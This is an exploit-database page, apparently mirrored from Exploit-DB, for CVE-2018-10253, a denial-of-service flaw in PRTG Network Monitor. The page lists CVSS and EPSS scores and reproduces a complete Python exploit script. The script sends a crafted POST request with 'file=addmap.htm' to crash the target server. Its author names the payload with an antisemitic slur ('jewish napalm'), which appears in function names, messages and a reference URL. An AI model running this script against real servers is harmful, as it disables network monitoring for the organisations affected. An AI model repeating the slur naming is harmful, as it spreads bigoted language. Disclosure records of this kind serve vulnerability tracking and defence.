Lucene search
LurielEDB-ID:44500HistoryApr 23, 2018 - 12:00 a.m.
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)
2018-04-2300:00:00
luriel
www.exploit-db.com
42
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.006 Low
EPSS
Percentile
79.4%
# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
#!/usr/bin/python
import requests
import sys
import os
import re
import socket
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
āāāāāāāāāāāāāā āāāāāāāāāāāāāāāāā āāā āāāā āāā āāāāāā āāāāāāā āāāāāā āāā āāāā āāāā
āāāāāāāāāāāāāā āāāāāāāāāāāāāāāāā āāā āāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāā āāāāā
āāāāāāāāā āāā āā āāāāāāāāāāāāāāāāāāāāāā āāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāā
āā āāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāāāāāāāāāāāāāāāā āāāāāāāāāāā āāāāāāāāāāā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā āāā āāā āāāāāāāāā āāāāāā āāā āāāāāāāāāāāāāā āāā āāā
āāāāāā āāāāāāāā āāāāāāāā āāāāāāāāāāāāāā āāā āāā āāāāāāāā āāāāāā āāā āāāāāāāāāāāāāā āāā
"""
banner2 = """
Author: @Lucas "luriel" Carmo
"""
os.system('clear')
print(green+banner)
print(yellow+banner2)
print(normal)
def check_http(url):
pattern = re.compile("http://")
return re.search(pattern, url)
def sanitize_url(url):
if(not check_http(url)):
return "http://" + url
return url
def check_server(url):
r = requests.get(url, timeout=4)
code = r.status_code
def send_jewish_payload(url):
payload = {'file':'addmap.htm'}
r = requests.post(url, params=payload)
def main():
try:
if len(sys.argv) <= 3 and len (sys.argv) >= 2:
try:
url = sanitize_url(sys.argv[1])
print(' [#] LOADING!')
if (check_server(url) != 404):
send_jewish_payload(url)
else:
print(' [!] Server shutdown or not found')
except requests.exceptions.ConnectionError:
print(' [~] BOOOOOM! PRTG Server has been exploded!')
except requests.exceptions.InvalidURL:
print(' [!] Invalid URL')
except requests.exceptions.Timeout:
print(' [!] Connection Timeout\n')
else:
print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
except KeyboardInterrupt:
print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
main()Related
cve
cve
CVE-2018-10253
2018-04-21 02:29:00
prion
prion
Code injection
2018-04-21 02:29:00
exploitpack
exploitpack
PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service)
2018-04-23 00:00:00
openvas
openvas
PRTG Network Monitor < 18.1.39.1648 Stack Overflow Vulnerability
2018-04-24 00:00:00
packetstorm
packetstorm
PRTG 18.1.39.1648 Stack Overflow
2018-04-23 00:00:00
cvelist
cvelist
CVE-2018-10253
2018-04-21 02:00:00
zdt
zdt
nvd
nvd
CVE-2018-10253
2018-04-21 02:29:00
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
0.006 Low
EPSS
Percentile
79.4%
Related for EDB-ID:44500